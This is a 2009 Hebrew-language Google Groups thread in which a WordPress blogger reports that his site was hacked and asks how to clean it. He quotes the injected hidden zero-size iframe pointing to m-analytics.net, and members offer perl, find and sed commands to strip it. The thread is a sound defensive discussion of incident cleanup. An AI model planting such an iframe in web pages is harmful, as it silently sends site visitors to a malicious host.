Gmail Calendar Documents Reader Web more »
Recently Visited Groups | Help | Sign in
Google Groups Home
הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!
There are currently too many topics in this group that display first. To make this topic appear first, remove this option from another topic.
There was an error processing your request. Please try again.
flag
  19 messages - Collapse all  -  Translate all to Translated (View all originals)
The group you are posting to is a Usenet group. Messages posted to this group will make your email address visible to anyone on the Internet.
Your reply message has not been sent.
Your post was successful
 
From:
To:
Cc:
Followup To:
Add Cc | Add Followup-to | Edit Subject
Subject:
Validation:
For verification purposes please type the characters you see in the picture below or the numbers you hear by clicking the accessibility icon. Listen and type the numbers you hear
 
tal.galili@gmail.com  
View profile  
 More options Jun 19, 7:04 pm
From: "tal.gal...@gmail.com" <tal.gal...@gmail.com>
Date: Fri, 19 Jun 2009 16:04:54 -0700 (PDT)
Local: Fri, Jun 19 2009 7:04 pm
Subject: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!
שלום חברים, הבלוג שלי נפרץ ונשתל בו קוד
IFRAME
הזדוני הבא:

<iframe src="http://m-analytics.net/qaqa/?
daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden"
frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

הבלוג שלי הוא:
http://www.talgalili.com/

הגיבויים של שירות האיחסון שבו אני מתארח הם חדשים מדי, וכוללים את
הגירסה המודבקת של הבלוג.
זה אומר שאני צריך לעבור ולנקות את הקבצים ידנית.

שאלות:
1) האם יש דרך אוטומאטית לעשות חיפוש והחלפה לקבצים על השרת ?
האם מישהו יודע איך עושים זאת ב
SITE5.com
?
2) האם מישהו מכיר את הפריצה הזו ?
האם זה כי פרצו לי ליוזר אף-טי-פי, או משהו אחר ?

תודה רבה,
טל


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
David Gur  
View profile  
 More options Jun 20, 1:52 am
From: David Gur <david...@gmail.com>
Date: Sat, 20 Jun 2009 08:52:35 +0300
Local: Sat, Jun 20 2009 1:52 am
Subject: Re: [wpheb] הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!

מהי גירסת הוורדפרס המותקנת באתר שלך?

2009/6/20 tal.gal...@gmail.com <tal.gal...@gmail.com>


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Tal Galili  
View profile  
 More options Jun 20, 2:26 am
From: Tal Galili <tal.gal...@gmail.com>
Date: Fri, 19 Jun 2009 23:26:38 -0700 (PDT)
Local: Sat, Jun 20 2009 2:26 am
Subject: Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!
2.8

On Jun 20, 8:52 am, David Gur <david...@gmail.com> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Nitsan Bin-Nun  
View profile  
 More options Jun 20, 2:38 am
From: Nitsan Bin-Nun <nit...@binnun.co.il>
Date: Sat, 20 Jun 2009 08:38:38 +0200
Local: Sat, Jun 20 2009 2:38 am
Subject: Re: [wpheb] Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!

אם site5 נותנים לך SSH אתה יכול לבצע את זה דרך הSSH עם השורה

perl -pi -w -e
's~<iframe[^>]+src=\"[^\"]+m\-analytics[^\"]\"[^>]*></iframe>~~g;' *.php

יכול להיות שזה ביטוי דפוק
כתבתי את זה בכמה שניות עכשיו במייל ולא בדקתי..
תחליף את *.php with *.* כדי לחפש ולמחוק מכל הקבצים

בהצלחה ושבת שלום

ניצן

2009/6/20 Tal Galili <tal.gal...@gmail.com>


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
David Gur  
View profile  
 More options Jun 20, 2:49 am
From: David Gur <david...@gmail.com>
Date: Sat, 20 Jun 2009 09:49:21 +0300
Local: Sat, Jun 20 2009 2:49 am
Subject: Re: [wpheb] Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!

אני חוויתי פריצות דומות עם וורדפרס מגירסה מיושנת ודרך phpbb מגירסה מיושנת,
ואצלי הבעיות נפתרו לחלוטין ברגע שהעפתי את היישומים מהגירסה המיושנת.
עושה רושם שאצלך הבעיה שונה לגמרי. ייתכן שנכנסו אליך דרך מערכת מיושנת אצל אחד
משכניך החולקים אתך את השרת השיתופי. עם זאת - אני מציע שתבצע את מה שמומלץ ב-
http://wordpress.org/support/topic/280878.
הבעיה היא לא לנקות את הקבצים אלא לזהות את הפירצה ולסתום אותה.

2009/6/20 Tal Galili <tal.gal...@gmail.com>


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Mark Kaplun  
View profile  
 More options Jun 20, 4:25 am
From: Mark Kaplun <m...@marksw.com>
Date: Sat, 20 Jun 2009 11:25:56 +0300
Local: Sat, Jun 20 2009 4:25 am
Subject: Re: [wpheb] הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!
עושה רושם שזה משהו בוורדפרס ולכן כדאי קודם כל להחליף תבנית ולסגור תוספים
אחד אחרי השני עד שהפריים נעלם. אם זה באמת קוד זדוני סביר להניח שלא תמצא
אותו על ידי חיפוש פשוט.


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Tal Galili  
View profile  
 More options Jun 20, 5:42 pm
From: Tal Galili <tal.gal...@gmail.com>
Date: Sat, 20 Jun 2009 14:42:32 -0700 (PDT)
Local: Sat, Jun 20 2009 5:42 pm
Subject: Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!
היי כולם.

דוד - אני מנחש שהפירצה היא שאיכשהו פרצו ל
FTP
שלי.
מרק - אני מעדיף להעלים את הקוד הזדוני באמצעות פקודת חיפוש-והחלף ישירה.

ניצן -
תודה רבה.
איך אפשר לוודא שהקוד שלך תקין ?
אחרת אני מפחד להריץ אותו ולפגום בקבצים שעל השרת שלי.
מצאתי קוד דומה באתר הזה:
http://fieldsmarshall.com/htmliframe-inf-wordpress-infection/
שמציע לעשות:
find / -type f | xargs grep -l '<iframe'| xargs perl -pi -e 's/^.*
\<iframe.*$/ /g'

האם תוכל לסייע ולתקן את הקוד מעט ולוודא שהוא יעבוד למקרה הזה?

תודה!
טל

On Jun 20, 11:25 am, Mark Kaplun <m...@marksw.com> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Nitsan Bin-Nun  
View profile  
 More options Jun 20, 5:45 pm
From: Nitsan Bin-Nun <nit...@binnun.co.il>
Date: Sat, 20 Jun 2009 23:45:33 +0200
Local: Sat, Jun 20 2009 5:45 pm
Subject: Re: [wpheb] Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!

חח הקוד שלהם מסיר כל IFRAME

הביטוי הרגולרי שלי מתאים ספציפית לשלך

מה שתעשה זה ככה

תעתיק את הקוד הזדוני לעמוד PHP נקי חדש
תשמור אותו עם סיומת PHP ותאחסן אותו באיזושהי תקייה בשרת

אחרכך תנווט אליה ותריץ את הפקודה כאשר אתה נמצא בא
אחרכך תבדוק את תוכן הקובץ - אם מה שרצית הוסר סימן שזה עובד :)

הא ואני פשוט לא נגעתי בFIND שנים ככה שאני מעדיף פרל

בהצלחה!

2009/6/20 Tal Galili <tal.gal...@gmail.com>


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Tomer Cohen  
View profile  
 More options Jun 20, 5:55 pm
From: Tomer Cohen <tom...@gmail.com>
Date: Sun, 21 Jun 2009 00:55:23 +0300
Local: Sat, Jun 20 2009 5:55 pm
Subject: Re: [wpheb] Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!

במידה ואין לך יותר מידי קבצים שעשית עליהם שינויים ואין לך עותק גיבוי שלהם,
אני ממליץ לבצע התקנה חדשה של וורדפרס, ולהחליף את כל הסיסמאות שלך.

2009/6/21 Nitsan Bin-Nun <nit...@binnun.co.il>

--
Tomer Cohen
http://tomercohen.com

    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Tal Galili  
View profile  
 More options Jun 20, 6:01 pm
From: Tal Galili <tal.gal...@gmail.com>
Date: Sat, 20 Jun 2009 15:01:17 -0700 (PDT)
Local: Sat, Jun 20 2009 6:01 pm
Subject: Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!
תודה ניצן.
לא נראה שזה עובד לי... :(

On Jun 21, 12:45 am, Nitsan Bin-Nun <nit...@binnun.co.il> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Tal Galili  
View profile  
 More options Jun 20, 6:22 pm
From: Tal Galili <tal.gal...@gmail.com>
Date: Sat, 20 Jun 2009 15:22:52 -0700 (PDT)
Local: Sat, Jun 20 2009 6:22 pm
Subject: Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!
אהלן תומר - זה לצערי לא ריאלי, הבוט הדביק בערך את כל הקבצים במערכת
שלי.
אני רוצה למצוא את הקוד שמסיר את הקוד הזדוני (מה שגם יהיה שימושי בפעמים
הבאות שזה יקרה פה לאנשים...)

נכנעתי להלילה, הלכתי לישון,
לילה טוב כולם,
טל

On Jun 21, 12:55 am, Tomer Cohen <tom...@gmail.com> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Nitsan Bin-Nun  
View profile  
 More options Jun 21, 8:40 am
From: Nitsan Bin-Nun <nit...@binnun.co.il>
Date: Sun, 21 Jun 2009 14:40:18 +0200
Local: Sun, Jun 21 2009 8:40 am
Subject: Re: [wpheb] Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!

תשמע הביטוי הרגולרי שנתנו בלינק שהבאת אמור לעבוד
הנקודה היא שהוא גנרי מאוד והוא יסיר כל iframe שיש לך בעמודים שלך

אם אתה בטוח שאין לך שימוש ב iframe בכל אחד מקבצי המערכת שלך כולל הפלאגינים
אין סיבה שלא תריץ אותו

שבוע מגניב

ניצן

2009/6/21 Tal Galili <tal.gal...@gmail.com>


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Tal Galili  
View profile  
 More options Jun 21, 9:52 am
From: Tal Galili <tal.gal...@gmail.com>
Date: Sun, 21 Jun 2009 06:52:18 -0700 (PDT)
Local: Sun, Jun 21 2009 9:52 am
Subject: Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!
טוב חברים, רק רציתי לעדכן אתכם שמצאתי פתרון (בזכות שילוב של כמה פיסות
קוד מאנשים שונים)

כתבתי את הפתרון כאן:
http://wordpress.org/support/topic/282366
(יחד עם עוד כמה טיפונים)

אני אסכם את הכל בבלוג שלי מתישהו בקרוב:
www.talgalili.com

שוב תודה למי שעזר (ויקבל קרדיט מלא בפוסט שאכתוב)

טל

On Jun 21, 1:22 am, Tal Galili <tal.gal...@gmail.com> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Nitsan Bin-Nun  
View profile  
 More options Jun 21, 10:03 am
From: Nitsan Bin-Nun <nit...@binnun.co.il>
Date: Sun, 21 Jun 2009 16:03:17 +0200
Local: Sun, Jun 21 2009 10:03 am
Subject: Re: [wpheb] Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!

הנקודה היא שמה שאתה עושה זה לחפש ביטוי רגולרי סטאטי לגמרי

אני חושב שיש לך טעות בחיפוש כיוון שבסטרינג הזה שנשתל אצלך

<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a"
width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0
scrolling=no></iframe>

יש את החלק שסימנתי שיכול להיות שהוא משתנה, היתי מריץ את הביטוי הבא:

find . -name '*.*' -exec sed -i 's~<iframe
src="http://m-analytics[^"]+"[^>]*></iframe>~~g'
{} \;

זה ביטוי כללי יותר

להת'
ניצן

2009/6/21 Tal Galili <tal.gal...@gmail.com>


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Tomer Cohen  
View profile  
 More options Jun 21, 10:06 am
From: Tomer Cohen <tom...@gmail.com>
Date: Sun, 21 Jun 2009 17:06:54 +0300
Local: Sun, Jun 21 2009 10:06 am
Subject: Re: [wpheb] Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!

למה בכלל לחפש *.*? אפשר פשוט לכתוב *.

והייתי מרחיב את החיפוש (חיפוש בלבד, ללא החלפה!) לכל קובץ שמופיעה בו המילה
iframe, כי אי־אפשר לדעת איפה הנוכלים החביאו את הקוד שלהם ואם באחד מהקבצים הם
הפנו לשם מתחם שונה.

2009/6/21 Nitsan Bin-Nun <nit...@binnun.co.il>

--
Tomer Cohen
http://tomercohen.com
P. J. O'Rourke  - "If government were a product, selling it would be
illegal."

    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Nitsan Bin-Nun  
View profile  
 More options Jun 21, 10:09 am
From: Nitsan Bin-Nun <nit...@binnun.co.il>
Date: Sun, 21 Jun 2009 16:09:26 +0200
Local: Sun, Jun 21 2009 10:09 am
Subject: Re: [wpheb] Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!

אם אתה רוצה לעבור על התוצאות ידנית אז כן - עדיף להרחיב את החיפוש ל
<iframe
ולכל הקבצים ואז להסיר בעצמך :)

2009/6/21 Tomer Cohen <tom...@gmail.com>


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Tal Galili  
View profile  
 More options Jun 21, 2:25 pm
From: Tal Galili <tal.gal...@gmail.com>
Date: Sun, 21 Jun 2009 11:25:22 -0700 (PDT)
Local: Sun, Jun 21 2009 2:25 pm
Subject: Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!
לניצן ותומר:
עד כמה שהצלחתי לזהות (ועברתי עם פלאגין שסורק את הקבצים לדברים חשודים,
שהצליח לזהות את הקוד הזדוני הזה) - הלינק שהם הכניסו הוא הלינק היחיד
(כמה מוזר שזה נראה).
לכן הלכתי על הקוד הסטטי.

ותומר - תודה על הטיפים הנוספים.

On Jun 21, 5:09 pm, Nitsan Bin-Nun <nit...@binnun.co.il> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Nitsan Bin-Nun  
View profile  
 More options Jun 21, 2:26 pm
From: Nitsan Bin-Nun <nit...@binnun.co.il>
Date: Sun, 21 Jun 2009 20:26:44 +0200
Local: Sun, Jun 21 2009 2:26 pm
Subject: Re: [wpheb] Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!

אני לא אוהב דברים סטאטים :)

2009/6/21 Tal Galili <tal.gal...@gmail.com>


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Tal Galili  
View profile  
 More options Jun 21, 4:02 pm
From: Tal Galili <tal.gal...@gmail.com>
Date: Sun, 21 Jun 2009 13:02:14 -0700 (PDT)
Local: Sun, Jun 21 2009 4:02 pm
Subject: Re: הבלוג שלי נפרץ ונשתל בו קוד זדוני - עזרה בבקשה!
טוב חברים,
בינתיים כתבתי פוסט על הנושא בבלוג שלי:

http://www.talgalili.com/?p=889

תודה לכולם על הנכונות לעזור!

לילה טוב,
טל

On Jun 20, 2:04 am, "tal.gal...@gmail.com" <tal.gal...@gmail.com>
wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
End of messages
« Back to Discussions « Newer topic     Older topic »

Create a group - Google Groups - Google Home - Terms of Service - Privacy Policy
©2009 Google